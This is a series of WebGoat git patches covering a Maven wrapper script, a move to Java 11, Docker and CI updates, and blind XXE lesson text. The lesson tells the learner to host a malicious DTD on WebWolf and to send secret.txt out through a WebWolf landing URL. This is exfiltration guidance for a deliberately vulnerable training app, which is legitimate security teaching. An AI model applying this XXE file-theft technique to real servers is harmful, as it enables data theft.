'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing my setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat" +if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd" +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. + +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar" +FOR /F "tokens=1,2 delims==" %%A IN (%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties) DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + echo Found %WRAPPER_JAR% +) else ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... + echo Downloading from: %DOWNLOAD_URL% + powershell -Command "(New-Object Net.WebClient).DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')" + echo Finished downloading %WRAPPER_JAR% +) +@REM End of extension + +%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat" +if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%" == "on" pause + +if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE% + +exit /B %ERROR_CODE% From ec225558b9d62fab16410e7491446f3d3e64199e Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Sat, 15 Dec 2018 13:59:54 +0100 Subject: [PATCH 19/28] Move to latest Spring Boot version and move to Java 11 --- pom.xml | 143 +++--------------- webgoat-container/pom.xml | 14 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- .../insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- .../java/org/owasp/webgoat/plugin/Users.java | 4 - webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 +- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- webgoat-lessons/xxe/pom.xml | 7 +- webgoat-server/pom.xml | 14 +- webwolf/pom.xml | 10 +- 26 files changed, 67 insertions(+), 167 deletions(-) diff --git a/pom.xml b/pom.xml index 206ecb2ed..bf6e77a90 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application @@ -21,7 +21,7 @@ org.springframework.boot spring-boot-starter-parent - 1.5.12.RELEASE + 1.5.18.RELEASE @@ -107,9 +107,6 @@ - 1.8 - 1.8 - UTF-8 UTF-8 @@ -129,7 +126,7 @@ 2.1 0.5 1.3.1 - 2.4 + 2.6 3.4 4.0.0 2.2.5 @@ -141,30 +138,25 @@ 2.6.3 2.6.3 6.0 - 1.2 + 1.3 1.7.12 1.3.1 4.12 + 1.18.4 1.5.4 - 3.3 - 2.19 + 3.8.0 + 2.22.0 1.6 2.6 2.10.4 2.5.2 3.0.1 - 2.19 + 2.22.0 1.6.6 2.11.7 2.1.20 2.48.2 3.2.4.RELEASE - 1.1.2 - 3.0.5 - 7.0.65 - 2.3-SNAPSHOT - 3.5.1 - 1.6.3 @@ -200,105 +192,12 @@ - - - release - - - org.owasp.webgoat.lesson - dist - 1.0 - zip - provided - plugins - - - - - - org.apache.maven.plugins - maven-dependency-plugin - - - unpack-lesson - - unpack-dependencies - - generate-resources - - - ${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons - - dist - *.jar - - - - - - org.sonatype.plugins - nexus-staging-maven-plugin - ${nexus-staging-maven-plugin.version} - true - - ossrh - https://oss.sonatype.org/ - false - - - - org.apache.maven.plugins - maven-source-plugin - ${maven-source-plugin.version} - - - attach-sources - - jar-no-fork - - - - - - org.apache.maven.plugins - maven-javadoc-plugin - ${maven-javadoc-plugin.version} - - - attach-javadocs - - jar - - - - - - org.apache.maven.plugins - maven-gpg-plugin - ${maven-gpg-plugin.version} - - - sign-artifacts - verify - - sign - - - WebGoat - - - - - - - - - org.projectlombok lombok provided + ${lombok.version} true @@ -306,10 +205,25 @@ commons-exec 1.3 + + javax.xml.bind + jaxb-api + 2.3.0 + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + 11 + 11 + UTF-8 + + org.apache.maven.plugins maven-release-plugin @@ -342,15 +256,6 @@ true - - com.versioneye - versioneye-maven-plugin - ${versioneye-maven-plugin.version} - - a1e4a9da4ed34ee44cab - 562da95be346d7000e0369ac - - diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 11edb880f..2f766037a 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -64,16 +64,6 @@ false - - org.apache.maven.plugins - maven-compiler-plugin - ${maven-compiler-plugin.version} - - 1.8 - 1.8 - ISO-8859-1 - - org.apache.maven.plugins maven-surefire-plugin @@ -191,7 +181,9 @@ junit ${junit.version} jar + test + diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 6e63139a2..0cdc9ef49 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index 29f56754c..c1d0102c0 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index b8f9144c9..f4a321fd7 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index 485e42b76..aa1d49872 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index b8c1021ff..6c99401b6 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index cc8d429c5..2366e85d3 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 2c7fe60c0..2585104ca 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 9fdf8d13b..4a2e3959b 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index a78c58090..23c24a5dd 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index 6620f6920..73e18fbaa 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index 68a95c885..08de6cf6a 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index ed6bd358e..faf241a51 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index ec6861190..e1856384d 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 8b266b4c2..7c2359247 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java index 9b01ac3d5..29be436b7 100644 --- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java +++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java @@ -1,6 +1,5 @@ package org.owasp.webgoat.plugin; -import com.sun.org.apache.xpath.internal.axes.HasPositionalPredChecker; import org.owasp.webgoat.assignments.Endpoint; import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.UserSessionData; @@ -13,9 +12,6 @@ import org.springframework.web.bind.annotation.ResponseBody; import javax.servlet.http.HttpServletRequest; import java.sql.*; import java.util.HashMap; -import java.util.Map; - -import static javax.swing.UIManager.getString; public class Users extends Endpoint{ diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index 5e78f3b0e..37c437ce9 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index e5f66efdf..c6d9f8b75 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index 46677291d..d2e50488c 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index df1c57c62..22411f819 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index d4e2db171..5e6d2ce7f 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index 22745b96a..a268b0602 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 781f2cc36..6d69be448 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -15,6 +15,11 @@ commons-lang 2.6 + + org.glassfish.jaxb + jaxb-runtime + 2.3.0 + com.github.tomakehurst diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index af9f6c6c1..31a304e2f 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -203,11 +203,13 @@ - - org.springframework.boot - spring-boot-devtools - true - + + + + + + + org.postgresql postgresql diff --git a/webwolf/pom.xml b/webwolf/pom.xml index bc2d30f0a..bb748e427 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -26,7 +26,7 @@ commons-io commons-io - LATEST + ${commons-io.version} org.springframework.boot @@ -103,9 +103,9 @@ maven-compiler-plugin ${maven-compiler-plugin.version} - 1.8 - 1.8 - ISO-8859-1 + 11 + 11 + UTF-8 From 3fa10c4b102577144f134abfb74a7a661c403328 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:23:03 +0100 Subject: [PATCH 20/28] Update to Java 11 --- README.MD | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.MD b/README.MD index 238f9231f..fd7831eb5 100644 --- a/README.MD +++ b/README.MD @@ -69,7 +69,7 @@ Using the `docker-compose` file will simplify getting WebGoat and WebWolf up and ### Prerequisites: -* Java 8 +* Java 11 * Maven > 3.2.1 * Your favorite IDE * Git, or Git support in your IDE From 959a3c64206db5ea43531b854638d52a0ad15670 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:23:21 +0100 Subject: [PATCH 21/28] Docker images should use new jar version notation --- webgoat-server/Dockerfile | 4 ++-- webwolf/Dockerfile | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile index c5b43c961..74d0cd4ae 100644 --- a/webgoat-server/Dockerfile +++ b/webgoat-server/Dockerfile @@ -1,6 +1,6 @@ -FROM openjdk:8-jre-slim +FROM openjdk:11.0.1-jre-slim-stretch -ARG webgoat_version=v8.0.0.SNAPSHOT +ARG webgoat_version=v8.0.0-SNAPSHOT RUN \ apt-get update && apt-get install && \ diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile index 2cdb1e708..a91bcbbce 100644 --- a/webwolf/Dockerfile +++ b/webwolf/Dockerfile @@ -1,6 +1,6 @@ -FROM openjdk:8-jre-slim +FROM openjdk:11.0.1-jre-slim-stretch -ARG webwolf_version=v8.0.0.SNAPSHOT +ARG webwolf_version=v8.0.0-SNAPSHOT RUN \ apt-get update && apt-get install && \ From c3ee0b7662b5d28f2aa3c9748c4d481e72b8a4c1 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:24:39 +0100 Subject: [PATCH 22/28] Travis build should also use Java 11 --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 46865c92f..792680eb5 100644 --- a/.travis.yml +++ b/.travis.yml @@ -2,7 +2,7 @@ services: - docker language: java jdk: -- oraclejdk8 +- openjdk11 install: "/bin/true" script: - export BRANCH=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then echo $TRAVIS_BRANCH; else echo $TRAVIS_PULL_REQUEST_BRANCH; fi) From 81d6e12ae142df2b7dbea92cdea9d123ecda7381 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:29:49 +0100 Subject: [PATCH 23/28] Spring devtools no longer work in combination with Spring and Java 11 --- webwolf/pom.xml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/webwolf/pom.xml b/webwolf/pom.xml index bb748e427..385a0fbc5 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -57,11 +57,13 @@ org.springframework.boot spring-boot-starter-data-jpa - - org.springframework.boot - spring-boot-devtools - true - + + + + + + + org.webjars From ed490a5ecfc7abbebe7329e0e680f0b607af9ba7 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 16 Jan 2019 11:07:30 +0100 Subject: [PATCH 24/28] Fix for #545 Introduced new macro to make a clear distinction between /WebWolf with context root and without. --- .../webgoat/AsciiDoctorTemplateResolver.java | 2 ++ .../owasp/webgoat/asciidoc/WebWolfMacro.java | 6 +++++- .../webgoat/asciidoc/WebWolfRootMacro.java | 20 +++++++++++++++++++ .../resources/lessonPlans/en/XXE_blind.adoc | 6 +++--- .../lessonPlans/en/XXE_blind_assignment.adoc | 2 +- 5 files changed, 31 insertions(+), 5 deletions(-) create mode 100644 webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java index ecb80bd43..df4c11e0b 100644 --- a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java +++ b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java @@ -37,6 +37,7 @@ import org.asciidoctor.Asciidoctor; import org.asciidoctor.extension.JavaExtensionRegistry; import org.owasp.webgoat.asciidoc.WebGoatVersionMacro; import org.owasp.webgoat.asciidoc.WebWolfMacro; +import org.owasp.webgoat.asciidoc.WebWolfRootMacro; import org.owasp.webgoat.i18n.Language; import org.thymeleaf.TemplateProcessingParameters; import org.thymeleaf.resourceresolver.IResourceResolver; @@ -87,6 +88,7 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver { StringWriter writer = new StringWriter(); JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry(); extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class); + extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class); extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class); asciidoctor.convert(new InputStreamReader(is), writer, createAttributes()); diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java index 7f81d63d1..2d655ce58 100644 --- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java +++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java @@ -45,6 +45,10 @@ public class WebWolfMacro extends InlineMacroProcessor { HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest(); String ip = request.getRemoteAddr(); String hostname = StringUtils.hasText(ip) ? ip : host; - return "http://" + hostname + ":" + port + "/WebWolf"; + return "http://" + hostname + ":" + port + (includeWebWolfContext() ? "/WebWolf" : ""); + } + + protected boolean includeWebWolfContext() { + return true; } } diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java new file mode 100644 index 000000000..b188c2a66 --- /dev/null +++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java @@ -0,0 +1,20 @@ +package org.owasp.webgoat.asciidoc; + +import java.util.Map; + +/** + * Usage in asciidoc: + *

+ * webWolfLink:here[] will display a href with here as text + * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing + */ +public class WebWolfRootMacro extends WebWolfMacro { + + public WebWolfRootMacro(String macroName, Map config) { + super(macroName, config); + } + + protected boolean includeWebWolfContext() { + return false; + } +} diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc index 72c9e4886..e8cfe8f71 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc @@ -5,7 +5,7 @@ Or the resource you are trying to read contains illegal XML character which caus Let's start with an example, in this case we reference an external DTD which we control on our own server. As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example -use this server to ping it using `webWolfLink:landing[noLink]` +use this server to ping it using `webWolfRootLink:landing[noLink]` How do we use this endpoint to verify whether we can perform XXE? @@ -14,7 +14,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi [source, subs="macros, specialcharacters"] ---- - + ---- Now submit the form change the xml using to: @@ -37,7 +37,7 @@ Now in WebWolf browse to 'Incoming requests' and you will see: ---- { "method" : "GET", - "path" : "/ping", + "path" : "/landing", "headers" : { "request" : { "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc index dd5ae4194..168d26426 100644 --- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc +++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc @@ -18,6 +18,6 @@ DTD. |`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt` |=== -Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]` +Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]` (NOTE: this endpoint is under your full control) Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson. \ No newline at end of file From dc5f9880af3e51b3bdd3196000bc4c95e517d2dc Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 17 Jan 2019 14:49:42 +0100 Subject: [PATCH 25/28] Full implementation of "Update Webgoat Dockerfile to use entrypoints and commands #523" based on the pull request of Nicklaus McClendon --- docker-compose.yml | 4 ++-- scripts/build-all.sh | 4 ++-- webgoat-server/Dockerfile | 5 ++++- webwolf/Dockerfile | 4 ++++ webwolf/start-webwolf.sh | 7 +++++++ 5 files changed, 19 insertions(+), 5 deletions(-) mode change 100644 => 100755 scripts/build-all.sh create mode 100755 webwolf/start-webwolf.sh diff --git a/docker-compose.yml b/docker-compose.yml index 27262211d..5712b6c43 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -8,11 +8,11 @@ services: - WEBWOLF_PORT=9090 ports: - "8080:8080" + - "9001:9001" volumes: - .:/home/webgoat/.webgoat - command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.port=8080 --server.address=0.0.0.0" webwolf: image: webgoat/webwolf ports: - "9090:9090" - command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" + command: 